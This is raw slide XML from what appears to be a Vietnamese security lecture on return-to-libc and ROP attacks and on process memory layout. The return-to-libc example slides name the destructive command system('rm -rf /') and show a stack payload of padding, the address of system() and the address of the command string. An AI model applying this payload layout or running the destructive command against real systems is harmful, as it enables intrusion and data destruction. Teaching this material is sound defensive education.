              <a:t>Ví dụ: các hàm thư viện chuẩn của C (libc), hàm lời gọi hệ thống</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Phần lớn các chương trình thường sử dụng các hàm mà mã nguồn đã được nạp vào bộ nhớ</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Các kỹ thuật khai thác:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Return-to-libc: ghi đè giá trị RIP để nhảy tới hàm trong thư viện chuẩn của C, hoặc hàm lời gọi hệ thống</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Return-oriented programming (ROP): tạo shellcode mà nó sử dụng một phần mã thực thi đã được nạp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD84272A-EE87-A4FC-0718-F8F5A237D746}"/>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977007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B7E8-3B1E-5AAF-6667-635A51FC98C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Return-to-libc: Ví dụ</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78C12EEE-F2C5-4A83-9DF7-81236A0482BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="434340" y="1143000"/>
            <a:ext cx="6023610" cy="633155"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800"/>
              <a:t>Kẻ tấn công muốn thực thi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>system(“rm -rf /“)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E2237D6-4C91-EC43-10BE-8F5279F06BB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>69</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Table 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{791D2753-D3A3-C0DA-C42E-BAE7711031C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3375974072"/>
              </p:ext>
            </p:extLst>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main</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lang="en-GB" sz="1400" b="1">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>SFP của main</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latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>SFP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6" name="Google Shape;912;p76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FE568C8-D254-9B74-CB00-DFADF7516014}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="37352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206A0B2F-40DB-0A0C-91DD-33C2BFCBA237}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2895600" y="3352800"/>
            <a:ext cx="2057400" cy="295462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dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>ystem:</a:t>
            </a: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p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en"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addl $4,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8" name="Group 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B2B4563-85CE-7870-F62F-6FEA2061EC51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2323159" y="4318783"/>
            <a:ext cx="990600" cy="307736"/>
            <a:chOff x="2133600" y="3886200"/>
            <a:chExt cx="1143000" cy="307736"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Google Shape;914;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDC5D43B-AB7D-DA56-C6CB-371954AE8C5A}"/>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10" name="Google Shape;915;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCDE7118-E75A-7E80-650E-36848854BD7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22E0D377-7B60-6383-C4E9-1A0BB3CC4644}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5105399" y="6025504"/>
            <a:ext cx="790803" cy="307736"/>
            <a:chOff x="5105399" y="6025504"/>
            <a:chExt cx="790803" cy="307736"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Google Shape;914;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{305DBA8E-E319-44A8-5AD9-71A94BFB2EF0}"/>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2" name="Google Shape;915;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAE5788F-E002-6A37-AF43-A36311544417}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="11"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26" name="Group 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B204F7F8-1BD3-EB29-83A6-9649A2808382}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5105399" y="4189532"/>
            <a:ext cx="790803" cy="307736"/>
            <a:chOff x="5105399" y="4189532"/>
            <a:chExt cx="790803" cy="307736"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Google Shape;914;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2C6CE66-00CE-2389-21FA-3A975E6B8FA8}"/>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14" name="Google Shape;915;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25504682-9FEF-1C74-AE61-2F3B27397EED}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="13"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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="241564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75C2-53BB-44B7-B1EF-91A733CBF984}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Bộ nhớ của tiến trình(Linux 32-bit)</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC6FC0F2-2F63-4870-9130-1AFF0E456B17}"/>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13" name="Rectangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04931B08-A3FE-7869-91DE-92A708A7DDC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048000" y="1371600"/>
            <a:ext cx="2514600" cy="4876800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="26425" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="79463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sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD7B64AF-F447-BA67-4771-50599EF515A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5734050" y="1109990"/>
            <a:ext cx="2514600" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914400"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0xffffffff</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2800">
              <a:solidFill>
                <a:srgbClr val="0000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A4330A0-79D5-B2B0-6982-23A92EA5B18B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5809927" y="2057400"/>
            <a:ext cx="2743200" cy="369331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rPr>
              <a:t>Lợi ích:</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Arial"/>
              </a:rPr>
              <a:t>Cách ly: Hai tiến trình truy cập với địa chỉ giống nhau trên bộ nhớ ảo của nó nhưng truy cập tới ô nhớ khác nhau trên bộ nhớ vật lý</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Arial"/>
              </a:rPr>
              <a:t>Tối thiểu hóa quyền: HĐH kiểm soát để tiến trình chỉ truy cập được vào bộ nhớ của nó</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="vi-VN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6733291-AC3F-8ADE-F91C-D49505E93CBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="2057400"/>
            <a:ext cx="2743200" cy="2031325"/>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Arial"/>
              </a:rPr>
              <a:t>Tiến trình coi bộ nhớ thuộc toàn bộ sở hữu của nó</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Arial"/>
              </a:rPr>
              <a:t>Thực tế đây là bộ nhớ ảo với địa chỉ ảo, sẽ đ</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="vi-VN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>ư</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>ợc HĐH/CPU ánh xạ sang địa chỉ vật lý</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="vi-VN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{620E6687-DE7E-869F-9F9B-0B65E79944D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5734050" y="5953780"/>
            <a:ext cx="2514600" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x00000000</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="280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38956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B7E8-3B1E-5AAF-6667-635A51FC98C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Return-to-libc: Ví dụ</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78C12EEE-F2C5-4A83-9DF7-81236A0482BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="434340" y="1221480"/>
            <a:ext cx="5604054" cy="378901"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Kẻ tấn công muốn thực thi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>system(“rm -rf /“)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E2237D6-4C91-EC43-10BE-8F5279F06BB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>70</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Table 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{791D2753-D3A3-C0DA-C42E-BAE7711031C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2342584330"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5896203" y="1447800"/>
          <a:ext cx="2714397" cy="488208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'\0'</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'r'</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'f'</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 '</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'r'</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'm'</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 '</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 sz="1400" b="1">
                          <a:solidFill>
                            <a:srgbClr val="1155CC"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>[address of "rm -rf /"]</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lang="en" sz="1400" b="1">
                          <a:solidFill>
                            <a:srgbClr val="38761D"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>'BBBB'</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 sz="1400" b="1">
                          <a:solidFill>
                            <a:srgbClr val="CC0000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>[address of system()]</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b="1">
                          <a:solidFill>
                            <a:srgbClr val="38761D"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>'AAAA'</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6" name="Google Shape;912;p76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FE568C8-D254-9B74-CB00-DFADF7516014}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="37352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206A0B2F-40DB-0A0C-91DD-33C2BFCBA237}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2895600" y="3352800"/>
            <a:ext cx="2057400" cy="295462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dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>ystem:</a:t>
            </a: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p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en"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addl $4,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ret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8" name="Group 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B2B4563-85CE-7870-F62F-6FEA2061EC51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2286000" y="4468247"/>
            <a:ext cx="990600" cy="307736"/>
            <a:chOff x="2133600" y="3886200"/>
            <a:chExt cx="1143000" cy="307736"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Google Shape;914;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDC5D43B-AB7D-DA56-C6CB-371954AE8C5A}"/>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10" name="Google Shape;915;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCDE7118-E75A-7E80-650E-36848854BD7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sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Google Shape;914;p76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{305DBA8E-E319-44A8-5AD9-71A94BFB2EF0}"/>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2" name="Google Shape;915;p76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAE5788F-E002-6A37-AF43-A36311544417}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="11"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sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Google Shape;914;p76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2C6CE66-00CE-2389-21FA-3A975E6B8FA8}"/>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14" name="Google Shape;915;p76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25504682-9FEF-1C74-AE61-2F3B27397EED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="13"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sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Google Shape;483;p70">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CD0AB8E-A1E3-2F19-6B2D-571A7F697192}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="205713" y="1708458"/>
            <a:ext cx="3783500" cy="1415742"/>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'A' * 24</a:t>
            </a:r>
            <a:b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[address of system()]</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
